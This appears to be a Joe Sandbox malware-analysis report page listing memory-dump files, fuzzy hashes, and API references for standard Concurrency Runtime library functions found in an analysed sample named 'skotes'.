Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 44f1768b755d064c1dd03a0f48c2680ab9ae5cb88d84e414850184e7898e4b46
Instruction ID: f2aeab1901cf68afbac9a94116d302f4b0ffe02d3e7f89c1dd1c55f59e14c5d7
Opcode Fuzzy Hash: 44f1768b755d064c1dd03a0f48c2680ab9ae5cb88d84e414850184e7898e4b46
Instruction Fuzzy Hash: 9A012671700531BFCB15BB66E882E6EB72AFF84714740002FF40597612CB28FC6187A8

Function 0042EE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0042EE6A
ListArray.LIBCONCRT ref: 0042EE7C

Part of subcall function 0042EF29: _InternalDeleteHelper.LIBCONCRT ref: 0042EF3B

ListArray.LIBCONCRT ref: 0042EE86
_InternalDeleteHelper.LIBCONCRT ref: 0042EE9F

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 2e19cb8a43a776ac21bd943c5af9691963ca2903f84d8e5ccbbb944da0314777
Instruction ID: 9ed21dda3097543c2a1c4ff9d88ecd8f38ba7b6e873cbf0e6ac539ec9bfb998c
Opcode Fuzzy Hash: 2e19cb8a43a776ac21bd943c5af9691963ca2903f84d8e5ccbbb944da0314777
Instruction Fuzzy Hash: EC01D671700531BFCA25BB63E9C2D6EBB69BF44714742002FF90557612CF28FC5196A8

Function 0042D0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0042D0C5
ListArray.LIBCONCRT ref: 0042D0D7

Part of subcall function 0042C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0042C6C4

ListArray.LIBCONCRT ref: 0042D0E1
_InternalDeleteHelper.LIBCONCRT ref: 0042D0FA

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 2137508fb049f8eff1a724b8c883c7446e53ae9c127918841f2879a89af4432a
Instruction ID: a3d9fd0789070db2494c28806b36cc9ed8b7217ab5609e9be0d48dc98353574b
Opcode Fuzzy Hash: 2137508fb049f8eff1a724b8c883c7446e53ae9c127918841f2879a89af4432a
Instruction Fuzzy Hash: E101D671B00531AFCA25BB62D8C2E6EB769BF44718740442FF80197611CF28AC6186A8

Function 004333C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004333DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004333EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043341F

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 148698cb8657f3ab7a0d111eac04cd811a00bb0e29ba6abd34784ed5a644fba4
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 74012632700524A7CF16EF658841AAFB7A99F58314F00001BFC12EB382DA74EE1193A5

Function 00429510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429519

Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429559

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction ID: d6309d90a18d788d3908b1ccc534cdb32d682efef3bce2effefe7705fdda7df8
Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction Fuzzy Hash: ADF0A731700A306FE662AB55A811F6B23D49F44719F40951FE41B97282CE2CEC82CB99

Function 0041EFCD Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 0041EFD1

Part of subcall function 0041F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041F989
Part of subcall function 0041F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041F9C0
Part of subcall function 0041F968: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0041F9CC

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EFDD

Part of subcall function 0041F40F: Concurrency::critical_section::unlock.LIBCMT ref: 0041F433

Concurrency::Context::Block.LIBCONCRT ref: 0041EFE2

Part of subcall function 00420366: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00420368

Concurrency::critical_section::lock.LIBCONCRT ref: 0041F002

Part of subcall function 0041F891: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F8AC
Part of subcall function 0041F891: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041F8B7

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
